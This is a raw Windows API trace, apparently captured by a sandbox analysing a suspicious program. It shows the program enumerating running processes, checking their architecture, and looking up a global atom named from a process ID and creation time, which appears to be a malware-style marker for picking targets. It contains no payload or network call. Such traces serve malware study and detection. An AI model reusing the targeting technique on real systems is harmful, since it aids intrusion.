	[0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.171] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.171] CloseHandle (hObject=0x248) returned 1
	[0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658f08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.171] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.171] CloseHandle (hObject=0x248) returned 1
	[0097.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658920, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.172] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.172] CloseHandle (hObject=0x248) returned 1
	[0097.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.172] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.172] CloseHandle (hObject=0x248) returned 1
	[0097.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe90, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.172] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.172] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.173] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.174] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.174] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] GetLastError () returned 0x5
	[0097.174] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.175] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetLastError () returned 0x5
	[0097.176] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.176] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.176] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.177] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.177] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.177] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.177] CloseHandle (hObject=0x248) returned 1
	[0097.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.177] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.177] CloseHandle (hObject=0x248) returned 1
	[0097.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ac48, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.178] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.178] CloseHandle (hObject=0x248) returned 1
	[0097.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.304] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.307] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ae08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0097.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0097.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0097.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0097.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0097.310] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.310] CloseHandle (hObject=0x248) returned 1
	[0097.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0097.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0097.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0097.311] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.311] CloseHandle (hObject=0x248) returned 1
	[0097.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0097.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0097.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0097.312] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.312] CloseHandle (hObject=0x248) returned 1
	[0097.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0097.312] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.312] CloseHandle (hObject=0x248) returned 1
	[0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0097.313] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.313] CloseHandle (hObject=0x248) returned 1
	[0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0097.313] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.313] CloseHandle (hObject=0x248) returned 1
	[0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658de8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0097.313] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.313] CloseHandle (hObject=0x248) returned 1
	[0097.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0097.314] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.314] CloseHandle (hObject=0x248) returned 1
	[0097.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0097.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0097.314] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.314] CloseHandle (hObject=0x248) returned 1
	[0097.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0097.314] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.315] CloseHandle (hObject=0x248) returned 1
	[0097.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0097.315] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.315] CloseHandle (hObject=0x248) returned 1
	[0097.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
